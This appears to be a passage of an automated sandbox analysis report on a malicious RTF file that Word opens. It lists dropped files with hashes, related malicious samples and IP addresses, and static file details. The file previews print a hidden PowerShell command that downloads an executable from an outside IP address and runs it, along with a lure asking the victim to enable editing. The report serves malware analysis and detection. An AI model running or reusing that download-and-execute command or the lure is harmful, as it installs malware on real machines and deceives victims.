                                              c8TrAKsz0T.exeGet hashmaliciousBrowse
                                              • 43.249.241.188
                                              AMAZON-02USOrder 122001-220 guanzo.exeGet hashmaliciousBrowse
                                              • 18.219.49.238
                                              main_setup_x86x64.exeGet hashmaliciousBrowse
                                              • 104.192.141.1
                                              A6FAm1ae1j.exeGet hashmaliciousBrowse
                                              • 3.138.180.119
                                              New_Order.exeGet hashmaliciousBrowse
                                              • 75.2.115.196
                                              NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                              • 13.58.50.133
                                              YDHhjjAEFbel88t.exeGet hashmaliciousBrowse
                                              • 99.83.175.80
                                              yU7RItYEQ9kCkZE.exeGet hashmaliciousBrowse
                                              • 99.83.175.80
                                              Shipment Document BL,INV and packing List.exeGet hashmaliciousBrowse
                                              • 52.58.78.16
                                              4xPBZai06p.dllGet hashmaliciousBrowse
                                              • 13.225.75.73
                                              0OyVQNXrTo.exeGet hashmaliciousBrowse
                                              • 3.142.167.54
                                              rAd00Nae9w.dllGet hashmaliciousBrowse
                                              • 13.225.75.73
                                              DOC24457188209927.exeGet hashmaliciousBrowse
                                              • 13.224.193.2
                                              user-invoice-8488888.docGet hashmaliciousBrowse
                                              • 104.192.141.1
                                              user-invoice-8488888.docGet hashmaliciousBrowse
                                              • 104.192.141.1
                                              ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                              • 13.113.228.117
                                              PO9448882.exeGet hashmaliciousBrowse
                                              • 18.219.49.238
                                              jjbxg8kh5X.exeGet hashmaliciousBrowse
                                              • 52.216.177.83
                                              4si5VtPNTe.exeGet hashmaliciousBrowse
                                              • 3.6.208.121
                                              latvia-order-051121_.docGet hashmaliciousBrowse
                                              • 52.219.129.63
                                              BANK-ACCOUNT. NUMBER.PDF.exeGet hashmaliciousBrowse
                                              • 3.16.197.4

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):973824
                                              Entropy (8bit):7.70861569543812
                                              Encrypted:false
                                              SSDEEP:24576:0Fu7fEF8VAJUFZ+MEEcg1B3DBp3LQySL683Olkck:oKeco9gXdBs681c
                                              MD5:457B22DA77D4DB093A31DD80A4B8963F
                                              SHA1:83DC32633108D309F6B6B50A42DC102E7375F54C
                                              SHA-256:8DC4C1A88F19DF4A3731991E632688147B6132BCB6CFFA2DFBEF8EE081C6DDAE
                                              SHA-512:988BC10454BAEA85766B9AF43D51073A155B17C63525795B55984E362B81E2E11717B947CE11C05D010682F8B92F5C73CC3918401B23CBAA44BFE976DEC6D45E
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              IE Cache URL:http://157.55.173.72/goose/docsc.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T..`..............P.............. ....... ....@.. .......................@............@.................................|...O....@............................................................................... ..................H............U#j;F_`0X... ...Z..................@....text................^.............. ..`.rsrc........@......................@..@.reloc..............................@..B............. ...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3A4D79D.png
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:370 sysV pure executable
                                              Category:dropped
                                              Size (bytes):262160
                                              Entropy (8bit):0.247221352544061
                                              Encrypted:false
                                              SSDEEP:96:srHrNEN+N8//zb+IfffFzlJBzkNDDN+N8//zb+IfffFDxB+3NhDN+N8/mLWrH+nA:szrNVmJJ6NumAc8zCJ6NumH
                                              MD5:6B08373CE59E1B6A082C8F908EFCB498
                                              SHA1:E761985A0EB9395FA98C3215E505FDE3F687C93D
                                              SHA-256:0C81F951A755A9619E11084FD7721C78C5558ABFC66080EB9A8A86498C006255
                                              SHA-512:A82ADB9C3C0DBA89CE0D8A172B77D66CB88AFF76E1B449CEE8115E6621625467330B853DD3E3EBEE75BDEC4BF0ED423C2F6147E8ABB5AF54BFA6B91676E2A119
                                              Malicious:false
                                              Reputation:low
                                              Preview: X.3.....p35.....o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e.". .-.N.o.P. .-.s.t.a. .-.N.o.n.I. .-.W. .H.i.d.d.e.n. .-.E.x.e.c.u.t.i.o.n.P.o.l.i.c.y. .b.y.p.a.s.s. .-.N.o.L.o.g.o. .-.c.o.m.m.a.n.d. .".(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.'.h.t.t.P.:././.1.5.7...5.5...1.7.3...7.2./.g.o.o.s.e./.d.o.c.s.c...e.x.e.'.,.'.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'.).;.S.t.a.r.t.-.P.r.o.c.e.s.s. .'.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'."...........t<.....p*6......................................?:.....................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8ADCC7F3-349E-46EF-BF24-C3A751787722}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CA5B12C-492C-4E57-AED2-0E7798ADDEF4}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):48006
                                              Entropy (8bit):3.0645151636531636
                                              Encrypted:false
                                              SSDEEP:768:kZ/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:WFia0Dqeb0nstw29rVzWSgm58F
                                              MD5:40DC8FD3190AC5BAF65BE740E0221323
                                              SHA1:4E29BCC8BF88F51C1D1068E879B285C63C75C0F5
                                              SHA-256:CF1C3C0F6FFB74E021219C869B3CD1FD194CB09968B7ED7BF00A2AB27FECA2BA
                                              SHA-512:35ABF79767DE77CBB9F0C3940DDD3C902CC445D97CE2C028D348EA473D4B658A30BA9ADC55CD4F05D38F6F05F33F15837629A6897FF409DC67C416FF403FDED9
                                              Malicious:false
                                              Preview: c.0.5.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .d.o.e.s. .n.o.t. .w.o.r.k. .i.n. .e.m.a.i.l. .P.r.e.v.i.e.w.....P.l.e.a.s.e. .d.o.w.n.l.o.a.d. .t.h.e. .d.o.c.u.m.e.n.t. .a.n.d. .c.l.i.c.k. .E.n.a.b.l.e. .E.d.i.t.i.n.g. .w.h.e.n. .o.p.e.n.i.n.g....... ... ... ... ... ... .'.s. ... ... ... ... ... .l.a.y.e.r. ... ..... ... ... ... ... .... "!t. .,. .... "!l.l. ... ... ... .,. ... .1.:.1.1. .2.:.3.4. ... ... ... ... ... ... ... ... ... ... .'.t. ... ... .'.t. ... ... ... .-.m.o.n.t.h.-.o.l.d.s. ... .8. .,. ... ...........................2...4...4....................... ............................................................................................................................................................................................................................................................................................................................................CJ..EH..OJ..QJ..^J..aJ.....j....U..mH..nH..u.....h.CK.5..CJ..OJ..QJ..^J..aJ....h.CK.CJ..OJ..QJ..^J..aJ.
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEE3E709-76F5-433D-BD56-9523C4C9DC31}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.3555252507007243
                                              Encrypted:false
                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbd:IiiiiiiiiifdLloZQc8++lsJe1Mzi
                                              MD5:81B550B5F462443F1FC776E302F6225C
                                              SHA1:D695D19225D25C741D8613FE67240A00455F81FD
                                              SHA-256:24E2442FC37480FD3E39B04C7009CF4977B2198060317AE9E810B0D4BCFEECE8
                                              SHA-512:593DEABF5B70469865F60CAC5D9BC2117F4E1068B11FAC501F9059ACCCDB3A58E307027E6B8B42C4813A585FA4738DA96AF4D7FF2CA53C3DB25B07E2AE86278A
                                              Malicious:false
                                              Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\Abctfhghgdghgh .ScT
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):70824
                                              Entropy (8bit):5.015044883176533
                                              Encrypted:false
                                              SSDEEP:768:cyeUfayeUf+aJEaTaPxgvtL1NlzUn7ZFPW1vv:cjzaJEaTaPxmNs7m
                                              MD5:E9848FFDB5AFEC900DE17C084EF3CF1A
                                              SHA1:161CA3A6F8D7F38EDC71B4EED043DC19A19FF543
                                              SHA-256:C9040B5F852F4E1682D2AFF0CB878D8624C5D75EA95C6FFCB601555B1EF60541
                                              SHA-512:530800E8CBE8EB0050BCB38EE315E4B3201577E65D97502C416B2E749155E8E5763C4E276C5B5DF89D185B437780F67BB19BD7BFCCC18741C4FE0A79C4E4B2CD
                                              Malicious:true
                                              Preview: ..<scriptlet.. >-@I..}}....................................................................................~{|}......................~{|}.................... It took him rd whilnb to rnbrdliznb thrdt nbvnbrything hnb dnbcidnbd not to chrdngnb, hnb wrds rdcturdlly choosing. Thnby throw crdbbrdgnb thrdt turns your brrdin into nbmotionrdl brdggrdgnb. Thnb tnbrdm mnbmbnbrs wnbrnb hrdrd to tnbll rdprdrt sincnb thnby rdll wornb thnbir hrdir in rd ponytrdil. Jonb mrddnb thnb sugrdr cookinbs; Susrdn dnbcorrdtnbd thnbm. Hnb found his rdrt nnbvnbr progrnbssnbd whnbn hnb litnbrrdlly usnbd his swnbrdt rdnd tnbrdrs. Hnb wrds so prnboccupinbd with whnbthnbr or not hnb could thrdt hnb frdilnbd to stop to considnbr if hnb should. Whnbn shnb didn.t liknb rd guy who wrds trying to pick hnbr up, shnb strdrtnbd using sign lrdngurdgnb. You'rnb good rdt nbng
                                              C:\Users\user\AppData\Local\Temp\Abctfhghgdghgh .ScT:Zone.Identifier
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:gAWY3n:qY3n
                                              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                              Malicious:false
                                              Preview: [ZoneTransfer]..ZoneId=3..
                                              C:\Users\user\AppData\Local\Temp\OICE_A3A241B7-2F36-435D-B046-C9F74B3487D8.0\FLDA58.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:370 sysV pure executable
                                              Category:dropped
                                              Size (bytes):262160
                                              Entropy (8bit):0.247221352544061
                                              Encrypted:false
                                              SSDEEP:96:srHrNEN+N8//zb+IfffFzlJBzkNDDN+N8//zb+IfffFDxB+3NhDN+N8/mLWrH+nA:szrNVmJJ6NumAc8zCJ6NumH
                                              MD5:6B08373CE59E1B6A082C8F908EFCB498
                                              SHA1:E761985A0EB9395FA98C3215E505FDE3F687C93D
                                              SHA-256:0C81F951A755A9619E11084FD7721C78C5558ABFC66080EB9A8A86498C006255
                                              SHA-512:A82ADB9C3C0DBA89CE0D8A172B77D66CB88AFF76E1B449CEE8115E6621625467330B853DD3E3EBEE75BDEC4BF0ED423C2F6147E8ABB5AF54BFA6B91676E2A119
                                              Malicious:false
                                              Preview: X.3.....p35.....o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e.". .-.N.o.P. .-.s.t.a. .-.N.o.n.I. .-.W. .H.i.d.d.e.n. .-.E.x.e.c.u.t.i.o.n.P.o.l.i.c.y. .b.y.p.a.s.s. .-.N.o.L.o.g.o. .-.c.o.m.m.a.n.d. .".(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.'.h.t.t.P.:././.1.5.7...5.5...1.7.3...7.2./.g.o.o.s.e./.d.o.c.s.c...e.x.e.'.,.'.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'.).;.S.t.a.r.t.-.P.r.o.c.e.s.s. .'.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'."...........t<.....p*6......................................?:.....................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1c60a1e9_by_Libranalysis.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed May 12 17:33:27 2021, mtime=Wed May 12 17:33:27 2021, atime=Wed May 12 17:33:32 2021, length=366007, window=hide
                                              Category:dropped
                                              Size (bytes):2168
                                              Entropy (8bit):4.576379502068498
                                              Encrypted:false
                                              SSDEEP:48:8OEP/XT0jVEeOEn6YLNnOEh5fY2OEP/XT0jVEeOEn6YLNnOEh5fc:8OM/XojmeF6YLNnFh5fY2OM/XojmeF6Z
                                              MD5:4A4F65170B2B3B37409D826247E406A7
                                              SHA1:DA6288DD5F7CD84ABE9815FDD373C79EA54738F1
                                              SHA-256:CD054360107CE703F55070F13F266A7E9ADA1109E710DE3B851A9215CB9AE774
                                              SHA-512:C6121F9E25A9E0E26D415607497F78D7B49B2B3C70B5A9E2F03ADBF3CD9BDB5D4E4986D8FD7D33A3BC0C28561D59E682EE444AB21E1BF376C40D47F5140948E1
                                              Malicious:false
                                              Preview: L..................F.... ......L]G.....L]G....O]G...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R1. .1C60A1~1.RTF..f......R...R..*...9&....................1.c.6.0.a.1.e.9._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop\1c60a1e9_by_Libranalysis.rtf.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.c.6.0.a.1.e.9._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):112
                                              Entropy (8bit):4.504089105237179
                                              Encrypted:false
                                              SSDEEP:3:HG56HoUwSLMp6lzV956HoUwSLMp6lmxWG56HoUwSLMp6lv:HG56HfNDb56HfNe56HfNf
                                              MD5:CEE04730739D3EEF9045C0EB9028B25B
                                              SHA1:BC7B0AC8E8CA41DA2CE2422C97879FD56524E853
                                              SHA-256:613EF1B1D5F8D4AB0C24527A403180B58A661E5D40DAEE6E840B7776956255FC
                                              SHA-512:2B49BB51CEE59E4C3F3BDFD121393C47D55A3E7E0F6EB8B3FE7B992542C88E17EBD6F32C59680132D5BF2F16251A96C4EF5DD1E3DD75ACB4C262337D5CC8F137
                                              Malicious:false
                                              Preview: [misc]..1c60a1e9_by_Libranalysis.LNK=0..1c60a1e9_by_Libranalysis.LNK=0..[misc]..1c60a1e9_by_Libranalysis.LNK=0..
                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.431160061181642
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                              MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                              SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                              SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                              SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                              Category:dropped
                                              Size (bytes):2
                                              Entropy (8bit):1.0
                                              Encrypted:false
                                              SSDEEP:3:Qn:Qn
                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                              Malicious:false
                                              Preview: ..
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DMR481T3UO04FSSHR3G3.temp
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):8016
                                              Entropy (8bit):3.5858206351478694
                                              Encrypted:false
                                              SSDEEP:96:chQCsMqdqvsqvJCwofz8hQCsMqdqvsEHyqvJCworZzv1YGH8yByCO1lUVNIu:cyUofz8yAHnorZzv6urO8Iu
                                              MD5:F9AE81732ACF72C19253B7D1EAF0F4CF
                                              SHA1:1941192132C8DC55A421218BE5787DF79ED1CE2E
                                              SHA-256:A9FB71C172C984B2CE7A30FA160FC60835640139BA0DD30779D3FF4930133B33
                                              SHA-512:82736AB8A82CA5F1C347AAFAFC46CEC054E365D3851E68026BA18570C978449650487F93F2241D5540406B0B9262C5ACB6D7842A188888544DDBF7FCC181608B
                                              Malicious:false
                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L17W9ZNBCUQUI8JBPCTD.temp
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):8016
                                              Entropy (8bit):3.5858206351478694
                                              Encrypted:false
                                              SSDEEP:96:chQCsMqdqvsqvJCwofz8hQCsMqdqvsEHyqvJCworZzv1YGH8yByCO1lUVNIu:cyUofz8yAHnorZzv6urO8Iu
                                              MD5:F9AE81732ACF72C19253B7D1EAF0F4CF
                                              SHA1:1941192132C8DC55A421218BE5787DF79ED1CE2E
                                              SHA-256:A9FB71C172C984B2CE7A30FA160FC60835640139BA0DD30779D3FF4930133B33
                                              SHA-512:82736AB8A82CA5F1C347AAFAFC46CEC054E365D3851E68026BA18570C978449650487F93F2241D5540406B0B9262C5ACB6D7842A188888544DDBF7FCC181608B
                                              Malicious:false
                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NEKL7LLMA2OV4UGS2LPM.temp
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):8016
                                              Entropy (8bit):3.5858206351478694
                                              Encrypted:false
                                              SSDEEP:96:chQCsMqdqvsqvJCwofz8hQCsMqdqvsEHyqvJCworZzv1YGH8yByCO1lUVNIu:cyUofz8yAHnorZzv6urO8Iu
                                              MD5:F9AE81732ACF72C19253B7D1EAF0F4CF
                                              SHA1:1941192132C8DC55A421218BE5787DF79ED1CE2E
                                              SHA-256:A9FB71C172C984B2CE7A30FA160FC60835640139BA0DD30779D3FF4930133B33
                                              SHA-512:82736AB8A82CA5F1C347AAFAFC46CEC054E365D3851E68026BA18570C978449650487F93F2241D5540406B0B9262C5ACB6D7842A188888544DDBF7FCC181608B
                                              Malicious:false
                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                              C:\Users\user\AppData\Roaming\docsc.exe
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):973824
                                              Entropy (8bit):7.70861569543812
                                              Encrypted:false
                                              SSDEEP:24576:0Fu7fEF8VAJUFZ+MEEcg1B3DBp3LQySL683Olkck:oKeco9gXdBs681c
                                              MD5:457B22DA77D4DB093A31DD80A4B8963F
                                              SHA1:83DC32633108D309F6B6B50A42DC102E7375F54C
                                              SHA-256:8DC4C1A88F19DF4A3731991E632688147B6132BCB6CFFA2DFBEF8EE081C6DDAE
                                              SHA-512:988BC10454BAEA85766B9AF43D51073A155B17C63525795B55984E362B81E2E11717B947CE11C05D010682F8B92F5C73CC3918401B23CBAA44BFE976DEC6D45E
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T..`..............P.............. ....... ....@.. .......................@............@.................................|...O....@............................................................................... ..................H............U#j;F_`0X... ...Z..................@....text................^.............. ..`.rsrc........@......................@..@.reloc..............................@..B............. ...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\Desktop\~$60a1e9_by_Libranalysis.rtf
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.431160061181642
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                              MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                              SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                              SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                              SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

                                              Static File Info

                                              General

                                              File type:Rich Text Format data, version 1, unknown character set
                                              Entropy (8bit):3.899302259961104
                                              TrID:
                                              • Rich Text Format (5005/1) 55.56%
                                              • Rich Text Format (4004/1) 44.44%
                                              File name:1c60a1e9_by_Libranalysis.rtf
                                              File size:366007
                                              MD5:1c60a1e972aaa5a3eb15c0adc2de7ead
                                              SHA1:921fed27f6b23f7f810ee03eeefb91634a295592
                                              SHA256:605e84b01e008da482a744feb468d9dd842148850fda1694a6772b6e38cc6c82
                                              SHA512:a6789f5cca2d7f18297bf0f1322e43ceb0a2d1d27f40a5f0c37b21cbcf86332ec2a9a68e8734192be7b4b002719d149538410eb6d3b38352a679432cadc3e9ac
                                              SSDEEP:3072:9NBrB2BrBrP5lHKK+aVYdzFDr5RDAw5wf/:VVcVr7KraVYdzFD1RDAUw3
                                              File Content Preview:{\rtf1\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEFlangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c667364

                                              File Icon

                                              Icon Hash:e4eea2aaa4b4b4a4

                                              Static RTF Info

                                              Objects

